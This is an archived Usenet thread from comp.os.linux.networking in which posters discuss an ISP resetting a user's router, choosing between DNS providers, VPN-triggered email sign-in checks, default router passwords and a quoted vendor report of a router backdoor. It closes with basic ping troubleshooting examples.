There are firewall rules that allow ABOUT 1536 hosts on the Internet
to connect to my LAN. The other 3636222392 hosts in IPv4 land can not
connect by default.    The firewall rules say packets ORIGINATING on
the router (or firewall) inbound are blocked from reaching the LAN.
The firewall ONLY accepts connections to it from two specific hosts on
the LAN.

[dawn ~]$  whatis nmap
nmap (1)       - Network exploration tool and security / port scanner
[dawn ~]$

Often, a worthy experiment is is use nmap (or similar) from a tolerant
host OUTSIDE, to scan your "Internet" address.   What's open ?  WHY???

        Old guy
0
Moe
9/7/2016 6:53:40 AM
On Wed, 7 Sep 2016, in the Usenet newsgroup comp.os.linux.networking, in article
<nqnt4b$1e46$1@gioia.aioe.org>, F Volker wrote:

>Moe Trin wrote:

>> I'd look to see if the VPN service offers DNS

>They suggest using Google Public DNS

See the Olympic judges over there holding up their score cards?

   2.0   2.5   2.3   2.4   2.2   2.1   1.9

I don't think the judges thought that advice/performance was very good

>I changed the DNS settings to Google Public DNS as suggested by My VPN 
>provider and hope that settings in both router and LAN work harmoniously.

Given a single host on your LAN - it should be OK.  I've got seven on
my LAN (with fixed, rather than DHCP addresses) - and those hostnames
and IPs are all in /etc/hosts.  This means my computers WON'T be asking
the DNS to resolve "local" hostnames (which the DNS server never heard
of, and would therefore reply "NXDOMAIN" (address doesn't exist)).  You
MIGHT run into a problem (rare, but it happens) where your computer
has to connect to am "ISP only" host - the hostname or address is only
valid on your ISP's wires.  An external DNS may not be able to resolve
the address (as it's for "internal use" only), and thus you would not
be able to connect to that host.  Example - my ISP runs a web server
that is ONLY accessible by customers - an external DNS would be looked
at as an outsider, and thus not provided the IP or what-ever.

>> "...and resetting things to the factory default will get things
>> "running".  May not be safest, but is easiest for them.

>If I read this correctly you are suggesting that the ISP changed the 
>settings of my router.

Yes - they put them back to "out-of-box" values.  I don't agree, but
the whole idea it to get you reconnected again.

>I assumed by changing the default login gateway username and gateway
>password would prevent anybody accessing my router including staff of
>ISP; Am I mistaken?

See my reply to Carlos

        Old guy
0
Moe
9/7/2016 6:55:06 AM
On 09/07/2016 01:55 PM, Moe Trin wrote:

[cut]

> See my reply to Carlos

Yes, I had a look at it - woosh, it went right over my head. I am just 
not good following this technical stuff.

So, the staff of the ISP are able to by-pass my Gateway username & 
password of the router and can reset the router settings even though the 
'remote management' function is disabled; I am astonished!

The settings are supposed to protect my privacy - if they are for nought 
what is there left to do especially for a non-tech person?

Don't the manufactures of reputable routers know that these settings can 
be so easily compromised? Right now I feel cheated.
0
F
9/7/2016 7:27:50 AM
On 2016-09-06, Carlos E. R. <robin_listas@invalid.es> wrote:
> On 2016-09-06 23:36, Moe Trin wrote:
>
>
>> Consider changing your DNS settings on the computer, rather than the
>> router.  Now, the computer is looking at the "DNS Server" (actually a
>> forwarder) on the router.  I wouldn't expect the router ON IT'S OWN to
>> be needing DNS - the router is merely forwarding IP packets.  Having a
>> "DNS Server" on the router is meant to make setting up the computers
>> on your LAN simpler (one place to screw up, not many) ;-)
>
> That is so.
>
> But there are some minor uses for a DNS by the router itself. For
> instance, my router queries a time server to get the current time. The

Either a bad idea or a really bad idea. Some routers are incompetently
programmed and hammer away on the time server. And why does your router
need to have accurate time? 

> time server is defined by name. Or the router may be configured to use
> dyndns or similar, also by name.
>
>
>>>> I called the ISP explaining my plight; After a few minutes waiting
>>>> their technical staff advised to reconfigure my router - an answer I
>>>> did not expect.
>> 
>> The usual problem - the customer has done "something" to the router, so
>> the ISP hell-desk people reach in (if they can) and reset things to the
>> factory defaults.   Not a reflection on you, but most customers haven't
>> any idea what they are doing, and resetting things to the factory default
>> will get things "running".  May not be safest, but is easiest for them.
>
> Ah, I did not consider that one.

Except that having your router open to "resetting" from outside is a
HUGE security hole, since they can do so much more than just resetting.
>
>
>
0
William
9/7/2016 8:18:32 AM
On 2016-09-07, F Volker <here@home.net> wrote:
> On 09/06/2016 05:35 PM, William Unruh wrote:
>
> [cut]
>
>> For what purpose? Why not stay with your ISPs DNS server? What is the
>> switch supposed to accomplish for you? To first order there is not
>> difference between DNS servers.
>
> Although my technical knowledge is limited, I am trying to better myself 
> by reading pertinent publications etc..
> My reason for not staying with the ISPs DNS server is covered under: 
> "Why Change Your Router's DNS Setting"
><http://m.setuprouter.com/router/linksys/wag200g/dns.htm>

A pretty lame article. And why should you be using the router's dns
onyour machines? While this may be "default" dhcp setting it is not
necessary. Also why would you use dhcp on your internal machines? Tell
the router to assign static addresses to your systems. And have the
systems assign their own dns. 

> The article does not explain the differences between the two options 
> hence my inquiry here.

Because there is none/

> Be that as it may, I feel that the speed for accessing websites has 
> increased ever so slightly but this may just be an imaginary impression.
>
>> To second order there might be a reason
>> to use one over the other (eg if you are using a VPN and want to hide
>> your DNS queries from your ISP.)
>
> Yes, a VPN service gives me comfort relating to privacy issues.
> I just haven't figured out on avoiding security checks imposed by the 
> e-mail accounts when switching from my regular ISP account to my VPN and 

Lets see, you want to operate a vpn for security, but object to security
for your emails? Strange.

> access my e-mail accounts. This is a real PITA which I am going to bring 
> up in an appropriate newsgroup/forum.
0
William
9/7/2016 8:24:17 AM
On 2016-09-07, F Volker <here@home.net> wrote:
> On 09/06/2016 07:54 PM, Roger Blake wrote:
>
> [cut]
>
>> It's not that unusual. I've seen this happen with power surges, sometimes
>> for no apparent reason other than buggy firmware.
>
> I feel comforted that the consent here is that this glitch is not 
> related to any hacking attempts to access my computer networks.

Noone here as any idea why YOUR machine reset. All we have done is list
some other possibilities. Whether they, or a hacking attempt, are the
explanation for your system none of us has any idea.


0
William
9/7/2016 8:25:57 AM
On 2016-09-07, F Volker <here@home.net> wrote:
> On 09/07/2016 04:36 AM, Moe Trin wrote:
>
> [cut]
>
>> It's actually relatively simple.  I'm not experienced with Mint, but
>> both Debian and Ubuntu had a single package that did most of the work.
>
> I look into that, thanks.
>
>>>> Though I am using a paid VPN service mainly for p2p downloads am
>>>> considering utilising the VPN service much more frequently.
>>
>> I'd look to see if the VPN service offers DNS
>
> They suggest using Google Public DNS
>
>> Consider changing your DNS settings on the computer, rather than the
>> router.  Now, the computer is looking at the "DNS Server" (actually a
>> forwarder) on the router.  I wouldn't expect the router ON IT'S OWN to
>> be needing DNS - the router is merely forwarding IP packets.  Having a
>> "DNS Server" on the router is meant to make setting up the computers
>> on your LAN simpler (one place to screw up, not many) ;-)
>
> I changed the DNS settings to Google Public DNS as suggested by My VPN 
> provider and hope that settings in both router and LAN work harmoniously.

Of course they could have recommended Google because of some evil
purposes of their own. Or because that was the first one they heard of. 


>
> [cut]
>
>> The usual problem - the customer has done "something" to the router, so
>> the ISP hell-desk people reach in (if they can) and reset things to the
>> factory defaults.   Not a reflection on you, but most customers haven't
>> any idea what they are doing,..."
>
> Well, the changes I made over the past few years in the router 
> configurations went quite uneventful. But then again there is always a 
> first time... The changes I made were always related to user-names, 
> pass-words & pass-phrases, time-zones, and ensuring that some settings 
> were enabled/disabled e.g. Firewall Protection or UPnP etc.. FWIW, I 
> never attempted to change setting in any PortForwarding tabs.
>
>> "...and resetting things to the factory default
>> will get things "running".  May not be safest, but is easiest for them.
>
> If I read this correctly you are suggesting that the ISP changed the 
> settings of my router. I assumed by changing the default login gateway 
> username and gateway password would prevent anybody accessing my router 
> including staff of ISP; Am I mistaken?
>
>> It may be time to replace the router -
>
> Because the equipment is relatively old I am now considering replacing 
> computer and router.
>
>>> Going back to my original question, which DNS server is preferred -
>>> Google Public or OpenDNS
>> Both "work" - but understand that the sole reason for the existence of
>> google is to provide "targeted" advertising, based on what they learn
>> about you. OpenDNS is less obvious, but you're not getting something
>> for nothing. From a privacy standpoint, it doesn't really matter that
>> much - your ISP (or VPN provider) can still see who you are looking for
>> and/or connecting to.
>
> Noted, thanks
>
0
William
9/7/2016 8:29:15 AM
Carlos E. R. wrote:
> On 2016-09-07 04:13, F Volker wrote:
>
>>> "...and resetting things to the factory default
>>> will get things "running".  May not be safest, but is easiest for them.
>> 
>> If I read this correctly you are suggesting that the ISP changed the
>> settings of my router. I assumed by changing the default login gateway
>> username and gateway password would prevent anybody accessing my router
>> including staff of ISP; Am I mistaken?
>
> The suggestion is that they reset the router to factory defaults,
> deleting all your settings including the password, in the thought that
> this would make things work, because defaults work for most people. A
> dangerous thing to do without asking the client, IMO.

Well, that depends -- if it's the ISP's CPE, these days, it's usually
something placed on a sticker on the bottom; so "factory defaults" is
pretty good (or at least better than "admin / admin" like it used to
be).

-- 
|_|O|_| Registered Linux user #585947
|_|_|O| Github: https://github.com/dpurgert
|O|O|O| 
0
Dan
9/7/2016 11:02:07 AM
On 2016-09-07 10:24, William Unruh wrote:
> A pretty lame article. And why should you be using the router's dns
> onyour machines? While this may be "default" dhcp setting it is not
> necessary. Also why would you use dhcp on your internal machines?

Because it is easier :-)

-- 
Cheers,
       Carlos E.R.
0
Carlos
9/7/2016 12:02:49 PM
On 2016-09-07 10:18, William Unruh wrote:
> On 2016-09-06, Carlos E. R. <robin_listas@invalid.es> wrote:


>> That is so.
>>
>> But there are some minor uses for a DNS by the router itself. For
>> instance, my router queries a time server to get the current time. The
> 
> Either a bad idea or a really bad idea. Some routers are incompetently
> programmed and hammer away on the time server. And why does your router
> need to have accurate time? 

Not accurate time. Just "time". Not hammering, just a single shot. Once.
Because if it doesn't, then the logs are dated 1970, simple as that.


>> time server is defined by name. Or the router may be configured to use
>> dyndns or similar, also by name.
>>
>>
>>>>> I called the ISP explaining my plight; After a few minutes waiting
>>>>> their technical staff advised to reconfigure my router - an answer I
>>>>> did not expect.
>>>
>>> The usual problem - the customer has done "something" to the router, so
>>> the ISP hell-desk people reach in (if they can) and reset things to the
>>> factory defaults.   Not a reflection on you, but most customers haven't
>>> any idea what they are doing, and resetting things to the factory default
>>> will get things "running".  May not be safest, but is easiest for them.
>>
>> Ah, I did not consider that one.
> 
> Except that having your router open to "resetting" from outside is a
> HUGE security hole, since they can do so much more than just resetting.

Not from outside, but by the ISP personnel and from the ISP office. A
limited set of people. Makes sense for the huge majority of customers
that have no idea how to manage a router, even less update it.

-- 
Cheers,
       Carlos E.R.
0
Carlos
9/7/2016 12:08:56 PM
On 2016-09-07 04:41, F Volker wrote:
> On 09/07/2016 09:26 AM, Carlos E. R. wrote:
> 
> [cut]
> 
>> The suggestion is that they reset the router to factory defaults,
>> deleting all your settings including the password, in the thought that
>> this would make things work, because defaults work for most people. A
>> dangerous thing to do without asking the client, IMO.
> 
> As far as I am concerned there wasn't even a reason to access my router
> in the first place; I never reported any issues... I've done what I did
> many times before. My hopeful thinking is that it may have been just
> glitch somewhere along when resetting some of the settings.

Yes there was. Per your words:

]> I called the ISP explaining my plight; After a few minutes waiting their
]> technical staff advised to reconfigure my router - an answer I did not
]> expect.

You called them, they reset your router. Easy. :-P


-- 
Cheers,
       Carlos E.R.
0
Carlos
9/7/2016 12:11:25 PM
On 2016-09-07 13:02, Dan Purgert wrote:
> Carlos E. R. wrote:


>> The suggestion is that they reset the router to factory defaults,
>> deleting all your settings including the password, in the thought that
>> this would make things work, because defaults work for most people. A
>> dangerous thing to do without asking the client, IMO.
> 
> Well, that depends -- if it's the ISP's CPE, these days, it's usually
> something placed on a sticker on the bottom; so "factory defaults" is
> pretty good (or at least better than "admin / admin" like it used to
> be).

Well, I also meant that resetting a customer router to defaults without
asking can be dangerous because the customer may have done important
modifications to the default config that are absolutely needed for his
use case. Like setting up VPN or using a different IP range than
192.168.1.*, routing ports, etc.

You are right, the password can be a sticker. In my case, I got the
password from a web form on my ISP, and it is different for each
customer. They do not want people configuring their own routers. When
going to http://router.local.ip you get redirected to
http://isp.internet.address, where we manage a limited set of config
changes via web form. Ie, I request a change on that web page, they
apply it to my router.

To get the password they require us to sign a form saying that we know
what you are doing.

-- 
Cheers,
       Carlos E.R.
0
Carlos
9/7/2016 12:21:13 PM
On 2016-09-07 09:27, F Volker wrote:
> On 09/07/2016 01:55 PM, Moe Trin wrote:
> 
> [cut]
> 
>> See my reply to Carlos
> 
> Yes, I had a look at it - woosh, it went right over my head. I am just
> not good following this technical stuff.
> 
> So, the staff of the ISP are able to by-pass my Gateway username &
> password of the router and can reset the router settings even though the
> 'remote management' function is disabled; I am astonished!

No, I don't think so. If remote management is disabled, they should not
be able. Also check to see what default ports are open to outside. There
are several places to check in the router.

But also your router is old, so possibly some of the things I said do
not apply to you.

> The settings are supposed to protect my privacy - if they are for nought
> what is there left to do especially for a non-tech person?
> 
> Don't the manufactures of reputable routers know that these settings can
> be so easily compromised? Right now I feel cheated.

Maybe, but then you have to apply the firmware updates they provide, if
they do.

Reminds me, some routers have security faults, and hackers learn of them
for their own purposes.


-- 
Cheers,
       Carlos E.R.
0
Carlos
9/7/2016 12:28:50 PM
> Reminds me, some routers have security faults, and hackers learn of them
              ^^^^
Haha!
Now there's an understatement.


        Stefan
0
Stefan
9/7/2016 1:32:47 PM
Carlos E. R. wrote:
> [snip]
>
> To get the password they require us to sign a form saying that we know
> what you are doing.
>

Now if I could only convince them that's all they need from me to let me
take this SFP outta their garbage router (in bridge mode), and plug it
directly into my router...

-- 
|_|O|_| Registered Linux user #585947
|_|_|O| Github: https://github.com/dpurgert
|O|O|O| 
0
Dan
9/7/2016 2:09:32 PM
On 2016-09-07 16:09, Dan Purgert wrote:
> Carlos E. R. wrote:
>> [snip]
>>
>> To get the password they require us to sign a form saying that we know
>> what you are doing.
>>
> 
> Now if I could only convince them that's all they need from me to let me
> take this SFP outta their garbage router (in bridge mode), and plug it
> directly into my router...

In my case, not that simple, because on defaults, that ISP router
handles two or three VPNS. One for the TV service, another for the
pseudo VoIP phone, and another perhaps for internet service. Something
like that, I don't have a clear picture.


-- 
Cheers,
       Carlos E.R.
0
Carlos
9/7/2016 7:53:36 PM
On Wed, 7 Sep 2016, in the Usenet newsgroup comp.os.linux.networking, in article
<nqofhm$476$1@gioia.aioe.org>, F Volker wrote:

>> See my reply to Carlos

>Yes, I had a look at it - woosh, it went right over my head. I am just 
>not good following this technical stuff.

They're no longer maintained, and therefore rarely included in Linux
distributions any more, but there is a large amount of technical
information for the less-skilled still available. They were called
"HOWTO"s and in the late 1990s there were about 500 documents, such as
the DNS-HOWTO:

     * DNS HOWTO
       Updated: Dec 2001. How to become a totally "small time" DNS
       admin.

which is about 40 pages long.   A bit dated, but still useful:

     * The Linux Networking Overview HOWTO
       Updated: Jul 2000. Overview of the networking capabilities of the
       Linux Operating System; provides pointers for further information
       and implementation details.
     * NET3-4-HOWTO, Linux Networking HOWTO
       Updated: Aug 1999. Aims to describe how to install and configure
       the Linux networking software and associated tools.

>So, the staff of the ISP are able to by-pass my Gateway username & 
>password of the router and can reset the router settings even though
>the 'remote management' function is disabled; I am astonished!

They MAY be able to do so - it depends on the specific manufacturer and
model.

>The settings are supposed to protect my privacy - if they are for nought 
>what is there left to do especially for a non-tech person?

Yes, that is a continuing problem.

>Don't the manufactures of reputable routers know that these settings can 
>be so easily compromised? Right now I feel cheated.

Ever wonder how long it's been ``normal'' for a manufacturer to include
a password protected account that is accessible from the world?

You've got to feel sorry for the {computer|modem|router} manufacturers.
They have to provide a complicated piece of electronics to the public,
and yet these devices have to be configured for such things as IP
address, address ranges (network mask), gateways, and the like, and
to have the average user do this is inviting disaster.  Everyone KNOWS
that the user will not read the instruction book (why should they,
when the book if full of warnings about operating the system in the
bath tub, not trying to clean it with gasoline and a hair dryer, or
letting children play with the plastic bag it came in, and similar
typical user errors expected by the company lawyers).  So it's got to
be really simple - because the users have absolutely no intention of
learning anything.  Hey, they know how to live without someone standing
next to them saying "Breath in...  Breath out..." 24 hours a day.

The manufacturer also KNOWS that the owner/user is going to screw up the
configuration of the box.  What can they do?   It's far to expensive to
have a technician come out to the house to configure things correctly,
and in any case the customer is going to be whining about having to be
home when the tech comes - which screws up scheduling and increases
costs yet again.

So they give the product a remote access, which allows them to fix the
configuration errors remotely.  But they've sold (or hope to sell)
thousands of these boxes. Should they have a unique password for each
and every one?   Not possible.  How would they know which one is
which?  Ask the customer to read a serial number?  Can't do that, as
the customer will whine about invading their privacy, never mind not
knowing how to read the numbers off the tag on the back or bottom of
the unit.   Well, I guess we'll have to have one password for
everyone...   wonder what that password will be...  something hard to
guess (one would hope)...  I know!  How about "admin"?  The partially
trained drug-crazed chimpanzees we've hired as customer service
representatives (at a pay rate of 2 bananas a day) should be able to
remember that one even if it's not a word in their native language.

You think I'm joking.  Surely the manufacturers would choose a much
obscure password (and username).  Why, that's as st00pid as the
passwords chosen for the administrator account on a windows box, by
users who lack the intelligence of retarded duck.  Remember the
W32/Deloader worm from March 2003?  (If not, use your favorite search
engine (try CERT Advisory CA-2003-08) and find the 87 passwords it knew
would work. Is your current password included in that list?)  And it's
getting worse, because of the "Internet of Things" - where modern
products like your refrigerator and cook-stove are going to have
Internet connectivity so that they can talk to each other and decide
what you are going to eat tonight (to improve your living experience,
what-ever that is supposed to mean).  Doing an internet search for
"default password list" should turn up lists of the secret passwords for
many products, and you'd be horrified to see how many use "admin" and
"admin" in spite of this problem being well known for more than 30 years.

So they should include instructions in the manual (that no one is going
to read) instructing the customer to _change_ the password.  Right, we
know how often that is going to work.  Besides, the "new" password is
_still_ going to be one of those 87 used by the W32/Deloader worm, and
in any case, the customer will have forgotten the damn thing anyway.
Put a "reset" button on the device, that the customer can press to
restore the system to factory defaults?  Bad idea, as this will
increase the cost, and unless it's physically out of the way will be
pressed accidentally or on purpose by the children of that retarded
duck.  And in the factory default mode, it doesn't work the way the
customer expects, so you must be selling plastic powdered dog p00p
(instead of the high quality real dog poop the customer expected and
paid for.)   The manufacturer get's blamed no matter what.

        Old guy
0
Moe
9/7/2016 9:50:23 PM
On Wed, 7 Sep 2016, in the Usenet newsgroup comp.os.linux.networking, in article
<ojc5ad-4hl.ln1@minas-tirith.valinor>, Carlos E. R. wrote:

>William Unruh wrote:

>> Carlos E. R. <robin_listas@invalid.es> wrote:

>>>> The usual problem - the customer has done "something" to the router,
>>>> so the ISP hell-desk people reach in (if they can) and reset things
>>>> to the factory defaults.   Not a reflection on you, but most
>>>> customers haven't any idea what they are doing, and resetting things
>>>> to the factory default will get things "running".  May not be safest,
>>>> but is easiest for them.

>>> Ah, I did not consider that one.

>> Except that having your router open to "resetting" from outside is a
>> HUGE security hole, since they can do so much more than just resetting.

Depends - but many manufacturers go further, giving administrative access
from outside.  Quoting from TWO YEAR OLD web-page from TrendMicro.com:

   Routers manufactured by Netcore, a popular brand for networking
   equipment in China have a wide-open backdoor that can be fairly
   easily exploited by attackers.  These products are also sold under
   the Netis brand name outside of China. This backdoor allows
   cybercriminals to easily run arbitrary code on these routers,
   rendering it vulnerable as a security device.

   What is this backdoor?  Simply put, it is an open UDP port listening
   at port 53413.  This port is accessible from the WAN side of the
   router.  This means that if the router in question has an externally
   accessible IP address (i.e., almost all residential and SMB users),
   an attacker from anywhere on the Internet can access the backdoor.

   This backdoor is "protected" by a single hardcoded password located
   in the routers's firmware.  Netcore/Netis routers appear to have the
   same password.  This "protection" is essentially ineffective, as
   attackers can easily log into these routers and users cannot
   modify or disable this backdoor.

Can we all slap our foreheads and say "DUH!!!"   (Shadowserver.org says
a ZMap scan found most of the 2 million-plus devices are in China, but
they're also found in Korea, Taiwan, Nepal, Pakistan, Hong Kong, and
elsewhere.)  In August, I saw hundreds of such connection attempts here
in Arizona.  "Duh!!!", indeed.

>Not from outside, but by the ISP personnel and from the ISP office.

And how exactly is such access restricted to ONLY the ISP office?  Do
you really think the ISP has put a filter that knows the IP of the
office systems on each and every router/modem/what-ever?   I don't
think so!  Perimeter firewalls can filter access "from the world" but
what about the skript-kiddiez and wanna-be's who are customers of that
ISP (or others who have r00ted/zombied some idiot customer of the ISP)?
And as pointed out elsewhere, there are a terrifying number of systems
out there with a "secret" username/password of admin and admin.

You may want to look at recent issues of the Digest of the "A.C.M. Forum
on Risks to the Public in Computers and Related Systems" (the Usenet
newsgroup "comp.risks").   As stupid governments are NOT learning, an
open back-door for "them" is an open back-door for all.

        Old guy
0
Moe
9/7/2016 9:52:01 PM
On 2016-09-07 23:52, Moe Trin wrote:
> On Wed, 7 Sep 2016, in the Usenet newsgroup comp.os.linux.networking, in article
> <ojc5ad-4hl.ln1@minas-tirith.valinor>, Carlos E. R. wrote:


>> Not from outside, but by the ISP personnel and from the ISP office.
> 
> And how exactly is such access restricted to ONLY the ISP office?  

Because that office has a known fixed IP, and the router comes
configured to only allow access to the special administrative interface
to packets coming from that IP (which perhaps can be faked).

These routers are only sold/installed by that ISP. If sold by a
different ISP, then that remote configuration interface has a different
configuration.

And yes, my current router came with a different admin password for each
client. The ISP keeps a database of those passwords somewhere. In some
cases these passwords were generated by an algorithm and people found
out how to generate the same password, perhaps tied to the phone number.
But they know this was done, and I hope this iteration they did it well,
not so easy to hack a password. I don't know for sure.

But that is not the case for the OP, his router is older.

-- 
Cheers,
       Carlos E.R.
0
Carlos
9/7/2016 10:52:11 PM
On 09/07/2016 03:24 PM, William Unruh wrote:

[cut]

> A pretty lame article. And why should you be using the router's dns
> on your machines? While this may be "default" dhcp setting it is not
> necessary. Also why would you use dhcp on your internal machines? Tell
> the router to assign static addresses to your systems. And have the
> systems assign their own dns.

I would not able to judge the quality of the article's content nor would 
I know how to respond to your questions. But I appreciate your opinion.

>> The article does not explain the differences between the two options
>> hence my inquiry here.

> Because there is none/

Thanks, I am glad for asking.

>> Yes, a VPN service gives me comfort relating to privacy issues.
>> I just haven't figured out on avoiding security checks imposed by the
>> e-mail accounts when switching from my regular ISP account to my VPN and
>
> Lets see, you want to operate a vpn for security, but object to security
> for your emails? Strange.

No, you got it wrong and judge too soon. I welcome security checks but 
am unsure on the frequency of these checks.

When switching from my regular ISP account to my VPN connection and 
access my Thunderbird e-mail client this message will pop up:

"Microsoft account
Verify your account
We detected something unusual about a recent sign-in for the Microsoft 
account fr*****@outlook.com. For example, you might be signing in from a 
new location, device, or app.
To help keep you safe, we've blocked access to your inbox, contacts 
list, and calendar for that sign-in. Please review your recent activity 
and we'll help you take corrective action. To regain access, you'll need 
to confirm that the recent activity was yours.
Review recent activity
Thanks,
The Microsoft account team"

Only after accessing each of my accounts on web-mail and completing all 
security steps can I access my mail accounts again in Thunderbird.
This happens each and every time when switching to a vpn server and 
becomes a royal pain especially if you have several e-mail accounts.

I find it strange that my g-mail accounts don't behave this way but then 
again it may be an inferior e-mail provider.

0
F
9/7/2016 11:42:12 PM
On 2016-09-08 01:42, F Volker wrote:

> When switching from my regular ISP account to my VPN connection and
> access my Thunderbird e-mail client this message will pop up:
> 
> "Microsoft account
> Verify your account
> We detected something unusual about a recent sign-in for the Microsoft
> account fr*****@outlook.com. For example, you might be signing in from a
> new location, device, or app.
> To help keep you safe, we've blocked access to your inbox, contacts
> list, and calendar for that sign-in. Please review your recent activity
> and we'll help you take corrective action. To regain access, you'll need
> to confirm that the recent activity was yours.
> Review recent activity
> Thanks,
> The Microsoft account team"
> 
> Only after accessing each of my accounts on web-mail and completing all
> security steps can I access my mail accounts again in Thunderbird.
> This happens each and every time when switching to a vpn server and
> becomes a royal pain especially if you have several e-mail accounts.


Well, it is an obvious side effect of using an VPN. Your provider,
outlook.com, thinks that it is not you because it looks as if you are
accessing from a location very far away from the one you did last time.

Why you use an VPN to access your email, I don't understand. Unless you
think your provider is spying on you... but then you use a mail provider
from USA, which means that the NSA reads it, anyway.


> I find it strange that my g-mail accounts don't behave this way but then
> again it may be an inferior e-mail provider.

No, it is not. It is probably more clever at guessing. And uses other
methods, like oauth2. Gmail may in fact send an SMS to your phone to
check it is really you.

-- 
Cheers,
       Carlos E.R.
0
Carlos
9/8/2016 1:10:37 AM
On 09/08/2016 08:10 AM, Carlos E. R. wrote:

[cut]

> Well, it is an obvious side effect of using an VPN.

Yes, a fair assessment. However, I did not realise the side effect is or 
would be selective.

> Your provider,
> outlook.com, thinks that it is not you because it looks as if you are
> accessing from a location very far away from the one you did last time.

So much for travelling fast to and from locations :)
When completing/confirming my last activity Microsoft ask among other 
things if "this devise is used frequently" which I respond to 'yes'. But 
it evidently does not 'remember' my [check mark].

> Why you use an VPN to access your email,

Absolutely no reason whatsoever! Sometimes I forget for being connected 
to the vpn server.

 > I don't understand.

These annoying incidents aroused my curiosity hence my inquiry.

> Unless you think your provider is spying on you...

IMHO, spying on e-mails is a concern and should not marginalised, taken 
likely or tolerated in any way alas it is in fact a realistic 
occurrence. Nobody I know would freely offer his/her e-mail address for 
me to read the content no matter how 'innocent' the pennings.

 > but then you use a
 > mail provider from USA, which means that the NSA reads it, anyway.

If I were still young and boisterous I'd use a different system, browser 
and e-mail provider (Tails, Tor and Proton spring into my mind).

>> I find it strange that my g-mail accounts don't behave this way but then
>> again it may be an inferior e-mail provider.
>
> No, it is not. It is probably more clever at guessing. And uses other
> methods, like oauth2. Gmail may in fact send an SMS to your phone to
> check it is really you.

Gmail does not have my phone number. If it can't be fixed then I just 
have to either switch to an other e-mail provider or discipline myself 
and remember on which server am currently connected and avoid accessing 
my e-mail accounts while connected to the vpn server.

0
F
9/8/2016 2:43:32 AM
On 09/07/2016 04:36 AM, Moe Trin wrote:

[cut]

> It may be time to replace the router - but the idea of the hell desk
> being able to reset things is a cost saving measure.  An alternative
> might be having a reset button on the router, and when things fail, the
> help desk staff tells you to push that button.  Is that a better choice?
> Maybe yes, maybe no.  They could also send out a tech to your house to
> reset things, but that is sure to cost you more.

Hindsight is a beautiful thing :)

As I mentioned in my previous response "It never occurred to me 
accessing the router settings!"

My router has indeed a reset button which if pressed for about 10 
seconds or so will activate a complete reset to its original (as 
purchased) state.

It would have been most revealing if I had the mindset resetting the 
router before initiating contacted with my ISP... maybe we wouldn't have 
this particular conversation. But rest assured I'll remember if this 
'challenge' recurs.

>> I am on Linux Mint 17.3 KDE.
> That's the computer, not the router.

I mentioned it for informative purpose only.

>> Going back to my original question, which DNS server is preferred -
>> Google Public or OpenDNS?
>
> Both "work" - but understand that the sole reason for the existence of
> google is to provide "targeted" advertising, based on what they learn
> about you.   OpenDNS is less obvious, but you're not getting something
> for nothing.   From a privacy standpoint, it doesn't really matter that
> much - your ISP (or VPN provider) can still see who you are looking for
> and/or connecting to.

Thanks, I'll be guided accordingly.

0
F
9/8/2016 3:15:55 AM
Carlos E. R. wrote:
> On 2016-09-07 16:09, Dan Purgert wrote:
>> Carlos E. R. wrote:
>>> [snip]
>>>
>>> To get the password they require us to sign a form saying that we know
>>> what you are doing.
>>>
>> 
>> Now if I could only convince them that's all they need from me to let me
>> take this SFP outta their garbage router (in bridge mode), and plug it
>> directly into my router...
>
> In my case, not that simple, because on defaults, that ISP router
> handles two or three VPNS. One for the TV service, another for the
> pseudo VoIP phone, and another perhaps for internet service. Something
> like that, I don't have a clear picture.

Probably VLANs more than VPNs ... but yeah, know what you mean.  ISP has
a couple of VLANs as well, but it's easy enough to configure (their CPE
has the details, so it's an easy copy).  The one thing I don't have is
the connection command (they use a custom firmware on their box, which
presumably has the pppoe credentials burned in).

-- 
|_|O|_| Registered Linux user #585947
|_|_|O| Github: https://github.com/dpurgert
|O|O|O| 
0
Dan
9/8/2016 11:06:32 AM
On 2016-09-08 13:06, Dan Purgert wrote:
> Carlos E. R. wrote:


>> In my case, not that simple, because on defaults, that ISP router
>> handles two or three VPNS. One for the TV service, another for the
>> pseudo VoIP phone, and another perhaps for internet service. Something
>> like that, I don't have a clear picture.
> 
> Probably VLANs more than VPNs ... 

Right.

> but yeah, know what you mean.  ISP has
> a couple of VLANs as well, but it's easy enough to configure (their CPE
> has the details, so it's an easy copy).  The one thing I don't have is
> the connection command (they use a custom firmware on their box, which
> presumably has the pppoe credentials burned in).


I'd have to find out the configuration from the router, I don't know if
they are published or where. And that router is little documented. Only
the kind of document that says: "In menu kxy you configure kxy". No
explaining what kxy does.

-- 
Cheers,
       Carlos E.R.
0
Carlos
9/8/2016 1:22:51 PM
On Thu, 8 Sep 2016, in the Usenet newsgroup comp.os.linux.networking, in article
<nqql5c$1h76$1@gioia.aioe.org>, F Volker wrote:

>Hindsight is a beautiful thing :)

Absolutely!

>My router has indeed a reset button which if pressed for about 10 
>seconds or so will activate a complete reset to its original (as 
>purchased) state.

Provided that when this is done, "things work properly", this is a
useful feature.  One must then remember to put in your personal
settings, such as changing that "admin:admin" password   ;-)

>It would have been most revealing if I had the mindset resetting the 
>router before initiating contacted with my ISP... maybe we wouldn't
>have this particular conversation. But rest assured I'll remember if
>this 'challenge' recurs.

Your system probably has "ping" installed.

[dawn ~]$ which ping
ping is /bin/ping
[dawn ~]$ whatis ping
ping (8)             - send ICMP ECHO_REQUEST to network hosts
[dawn ~]$

A problem is finding a host out on the Internet that will respond (ping
has been abused so much that many Internet hosts disable the responder).
Lessee, www.ibiblio.org is a host in the Eastern USA, and it has an IP
address of 152.19.134.40.  I choose it because from experience I know it
will _usually_ respond to pings.

[dawn ~]$ ping -c1 152.19.134.40
PING 152.19.134.40 (152.19.134.40) 56(84) bytes of data.
64 bytes from 152.19.134.40: icmp_req=1 ttl=48 time=126 ms

That shows I have a working connection to at least some part of the
world.  Next,

[dawn ~]$ ping -c1 www.ibiblio.org
PING www.ibiblio.org (152.19.134.40) 56(84) bytes of data.
64 bytes from www.ibiblio.org (152.19.134.40): icmp_req=1 ttl=48
 time=436 ms

This shows that my DNS can discover the IP address of that host.   If
the first step fails, you don't have connectivity.  If it works, but
the second step (by name) fails, something is wrong with the DNS or
DNS setup.  Note the "extra time" that the second test took - that's
mostly the time needed for the DNS server to figure out the name/IP
translation.   It helps to know the hostname and IP address of several
systems "out there" that will respond to pings.  Two other hosts are
"google-public-dns-a.google.com (8.8.8.8) and it's brother
"google-public-dns-b.google.com" at 8.8.4.4.

If you are curious, there are two other tools that MAY be installed on
your system - traceroute and/or tcptraceroute.   Both use a trick with
the IP header "Time-To-Live" parameter, and depend on hosts along the
